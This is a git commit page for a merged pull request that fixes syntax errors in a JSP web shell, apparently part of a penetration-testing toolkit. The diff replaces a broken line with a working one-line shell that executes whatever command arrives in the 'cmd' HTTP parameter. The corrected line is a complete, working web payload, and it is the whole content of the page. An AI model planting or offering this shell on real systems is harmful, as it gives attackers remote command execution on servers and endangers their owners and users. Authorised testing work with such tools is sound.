Merge pull request #365 from wasamasa/fix-jsp-web-shell

Fix JSP webshell syntax errors
This commit is contained in:
g0tmi1k 2019-10-22 22:01:27 +01:00 committed by GitHub
commit af721716c1
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -1,3 +1,3 @@
<%
Runtime.getruntime().exec(request.getParameter("cmd"))
Runtime.getRuntime().exec(request.getParameter("cmd"));
%>